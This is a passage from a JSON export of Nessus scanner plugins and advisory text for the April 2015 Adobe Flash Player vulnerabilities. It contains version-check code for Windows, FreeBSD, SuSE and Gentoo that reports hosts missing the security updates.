files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"17.0.0.169 / 13.0.0.281\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"17.0.0.169 / 13.0.0.281\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome after version 21\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n 
info += '\\n Fixed version : 17.0.0.169 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:41:08", "description": "Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player for\nWindows, Macintosh and Linux. These updates address vulnerabilities\nthat could potentially allow an attacker to take control of the\naffected system. Adobe is aware of a report that an exploit for\nCVE-2015-3043 exists in the wild, and recommends users update their\nproduct installations to the latest versions.\n\n- These updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\nCVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n- These updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2015-0356).\n\n- These updates resolve a buffer overflow vulnerability that could\nlead to code execution (CVE-2015-0348).\n\n- These updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\nCVE-2015-3039).\n\n- These updates resolve double-free vulnerabilities that could lead to\ncode execution (CVE-2015-0346, CVE-2015-0359).\n\n- These updates resolve memory leak vulnerabilities that could be used\nto bypass ASLR (CVE-2015-0357, 
CVE-2015-3040).\n\n- These updates resolve a security bypass vulnerability that could\nlead to information disclosure (CVE-2015-3044).", "edition": 21, "published": "2015-04-20T00:00:00", "title": "FreeBSD : Adobe Flash Player -- critical vulnerabilities (3364d497-e4e6-11e4-a265-c485083ca99c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-20T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin"], "id": "FREEBSD_PKG_3364D497E4E611E4A265C485083CA99C.NASL", "href": "https://www.tenable.com/plugins/nessus/82890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82890);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n\n script_name(english:\"FreeBSD : Adobe Flash Player -- critical vulnerabilities (3364d497-e4e6-11e4-a265-c485083ca99c)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player for\nWindows, Macintosh and Linux. These updates address vulnerabilities\nthat could potentially allow an attacker to take control of the\naffected system. Adobe is aware of a report that an exploit for\nCVE-2015-3043 exists in the wild, and recommends users update their\nproduct installations to the latest versions.\n\n- These updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\nCVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n- These updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2015-0356).\n\n- These updates resolve a buffer overflow vulnerability that could\nlead to code execution (CVE-2015-0348).\n\n- These updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\nCVE-2015-3039).\n\n- These updates resolve double-free vulnerabilities that could lead to\ncode execution (CVE-2015-0346, CVE-2015-0359).\n\n- These updates resolve memory leak vulnerabilities that could be used\nto bypass ASLR (CVE-2015-0357, CVE-2015-3040).\n\n- These updates resolve a security bypass vulnerability that could\nlead to information disclosure (CVE-2015-3044).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\"\n );\n # https://vuxml.freebsd.org/freebsd/3364d497-e4e6-11e4-a265-c485083ca99c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f830ac3e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the 
affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<=11.2r202.451\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<=11.2r202.451\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:17:18", "description": "Adobe Flash Player was updated to version 11.2.202.457 to fix several\nsecurity issues that could have lead to remote code execution.\n\nAn exploit for CVE-2015-3043 was reported to exist in the wild.\n\nThe following vulnerabilities have been fixed :\n\n - Memory corruption vulnerabilities that could have lead\n to code execution. (CVE-2015-0347 / CVE-2015-0350 /\n CVE-2015-0352 / CVE-2015-0353 / CVE-2015-0354 /\n CVE-2015-0355 / CVE-2015-0360 / CVE-2015-3038 /\n CVE-2015-3041 / CVE-2015-3042 / CVE-2015-3043)\n\n - Type confusion vulnerability that could have lead to\n code execution. (CVE-2015-0356)\n\n - Buffer overflow vulnerability that could have lead to\n code execution. (CVE-2015-0348)\n\n - Use-after-free vulnerabilities that could have lead to\n code execution. (CVE-2015-0349 / CVE-2015-0351 /\n CVE-2015-0358 / CVE-2015-3039)\n\n - Double-free vulnerabilities that could have lead to code\n execution. 
(CVE-2015-0346 / CVE-2015-0359)\n\n - Memory leak vulnerabilities that could have been used to\n bypass ASLR. (CVE-2015-0357 / CVE-2015-3040)\n\n - Security bypass vulnerability that could have led to\n information disclosure. (CVE-2015-3044)", "edition": 24, "published": "2015-04-16T00:00:00", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 10615)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-16T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-150415.NASL", "href": "https://www.tenable.com/plugins/nessus/82819", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82819);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 10615)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 11.2.202.457 to fix several\nsecurity issues that could have lead to remote code execution.\n\nAn exploit for CVE-2015-3043 was reported to exist in the wild.\n\nThe following vulnerabilities have been fixed :\n\n - Memory corruption vulnerabilities that could have lead\n to code execution. (CVE-2015-0347 / CVE-2015-0350 /\n CVE-2015-0352 / CVE-2015-0353 / CVE-2015-0354 /\n CVE-2015-0355 / CVE-2015-0360 / CVE-2015-3038 /\n CVE-2015-3041 / CVE-2015-3042 / CVE-2015-3043)\n\n - Type confusion vulnerability that could have lead to\n code execution. (CVE-2015-0356)\n\n - Buffer overflow vulnerability that could have lead to\n code execution. (CVE-2015-0348)\n\n - Use-after-free vulnerabilities that could have lead to\n code execution. 
(CVE-2015-0349 / CVE-2015-0351 /\n CVE-2015-0358 / CVE-2015-3039)\n\n - Double-free vulnerabilities that could have lead to code\n execution. (CVE-2015-0346 / CVE-2015-0359)\n\n - Memory leak vulnerabilities that could have been used to\n bypass ASLR. (CVE-2015-0357 / CVE-2015-3040)\n\n - Security bypass vulnerability that could have lead to\n information disclosure. (CVE-2015-3044)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=927089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0346.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0347.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0348.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0349.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0350.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0351.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0352.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0353.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0354.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0355.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://support.novell.com/security/cve/CVE-2015-0357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0358.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0359.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0360.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3038.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3039.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3040.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3041.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3042.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3043.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3044.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10615.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.457-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", 
reference:\"flash-player-gnome-11.2.202.457-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.457-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.457-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.457-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.457-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:04:36", "description": "The remote host is affected by the vulnerability described in GLSA-201504-07\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 23, "published": "2015-06-10T00:00:00", "title": "GLSA-201504-07 : Adobe Flash Player: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-06-10T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adobe-flash"], "id": 
"GENTOO_GLSA-201504-07.NASL", "href": "https://www.tenable.com/plugins/nessus/84072", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201504-07.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84072);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_bugtraq_id(74062, 74064, 74065, 74066, 74067, 74068, 74069);\n script_xref(name:\"GLSA\", value:\"201504-07\");\n\n script_name(english:\"GLSA-201504-07 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201504-07\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary 
code with the\n privileges of the process or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201504-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-11.2.202.457'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.457\"), vulnerable:make_list(\"lt 11.2.202.457\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:28:27", "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\nissues that could lead to remote code execution.\n\nAn exploit for CVE-2015-3043 was reported to exist in the wild.\n\nThe following vulnerabilities were fixed :\n\n - Memory corruption vulnerabilities that could lead to\n code execution (CVE-2015-0347, CVE-2015-0350,\n CVE-2015-0352, CVE-2015-0353, CVE-2015-0354,\n CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n - Type confusion vulnerability that could lead to code\n execution (CVE-2015-0356).\n\n - Buffer overflow vulnerability that could lead to code\n execution (CVE-2015-0348).\n\n - Use-after-free vulnerabilities that could lead to code\n execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039).\n\n - Double-free vulnerabilities that could lead to code\n execution (CVE-2015-0346, CVE-2015-0359).\n\n - Memory leak vulnerabilities that could be used to bypass\n ASLR (CVE-2015-0357, CVE-2015-3040).\n\n - Security bypass vulnerability that could lead to\n 
